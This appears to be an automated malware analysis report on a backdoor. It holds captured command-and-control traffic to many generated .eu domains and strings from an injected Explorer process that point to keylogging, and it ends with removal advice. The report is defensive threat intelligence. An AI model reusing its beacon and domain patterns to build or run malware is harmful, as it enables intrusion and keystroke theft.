Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.norumikemem.eu
Vary: Accept-Encoding


GET /f2c2596452aa9379694886959d3b2888 HTTP/1.1
Host: xsso.rynazuqihoj.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
19..Landed rynazuqihoj.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.qebahilojam.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/jewuqyjywyv.eu
Set-Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET /71c55851e5901a95263b027885fa0411 HTTP/1.1
Host: xsso.jewuqyjywyv.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
19..Landed jewuqyjywyv.eu<br>..0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qekikyvutic.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:19 GMT
Server: Apache
Set-Cookie: vsid=909vr1955561591417248; expires=Wed, 18-Nov-2020 09:09:19 GMT; path=/; domain=ww92.qekikyvutic.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.qexofyqihid.eu
Vary: Accept-Encoding


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.puregivytoh.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK
X-Sinkhole: Malware sinkhole
Content-Type: text/html
Server: nginx/0.7.65
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Length: 0


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.tufecagemyl.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:05 GMT
Server: Apache
Set-Cookie: vsid=910vr1955561452511509; expires=Wed, 18-Nov-2020 09:09:05 GMT; path=/; domain=ww92.tufecagemyl.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=106
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.lykemujebeq.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.qebahilojam.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.galokusemus.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET /domain/kemocujufys.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
Location: hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6
3e..Go hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6..0.
.


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: novomyfexij.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:06 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.novomyfexij.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/nopegymozow.eu
Set-Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.ganycyhywek.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/kemocujufys.eu
Set-Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/qeqinuqypoq.eu
Set-Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET /domain/marytymenok.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
Location: hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960
3e..Go hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960..0.
.


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.jeluganusog.eu
Vary: Accept-Encoding


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.mamixikusah.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=902vr1955561446822064; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.mamixikusah.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: masawocipel.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.masawocipel.eu
Vary: Accept-Encoding


GET /domain/gatedyhavyd.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
Location: hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81
3e..Go hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81..0.
.


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.jeluganusog.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:07 GMT
Server: Apache
Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.ganycyhywek.eu
Vary: Accept-Encoding


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.masawocipel.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache
Set-Cookie: vsid=919vr1955561836832705; expires=Wed, 18-Nov-2020 09:09:43 GMT; path=/; domain=ww92.masawocipel.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET /d1e2832667be3ac8af2587e3c0958424 HTTP/1.1
Host: xsso.tucyguqaciq.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
19..Landed tucyguqaciq.eu<br>..0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.ryleryqacic.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=916vr1955561446614594; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.ryleryqacic.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=109
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/gatedyhavyd.eu
Set-Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:52 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.xuqufyduras.eu
Vary: Accept-Encoding



POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:55 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.xuqufyduras.eu
Vary: Accept-Encoding


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.novomyfexij.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:36 GMT
Server: Apache
Set-Cookie: vsid=914vr1955561764501275; expires=Wed, 18-Nov-2020 09:09:36 GMT; path=/; domain=ww92.novomyfexij.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

The Backdoor connects to the servers at the following location(s):

Explorer.EXE_1572_rwx_01EA0000_000B2000:

GetKeyboardLayoutList
GetAsyncKeyState
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
VkKeyScanExW
keybd_event
EnumChildWindows
ActivateKeyboardLayout
SetKeyboardState
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegNotifyChangeKeyValue
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSVCRT.dll
AVICAP32.dll
MSVFW32.dll
ShellExecuteW
GetProcessHeap
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
5`6C6Q6}6
55
;";,;6;<;_;{;
6&7-737<7|7
3"33393>3}3
;#;);/;=;
<"=3=9=>=}=
:(:-:8:=:
7#7)7/7=7
9&9,929@9
0!02090>0
>$>*>4>9>
Windows Explorer
mavast.com
ya.ru
serverkey.dat
\windows\
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
.Prev
.current

Explorer.EXE_1572_rwx_02060000_000B8000:



Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
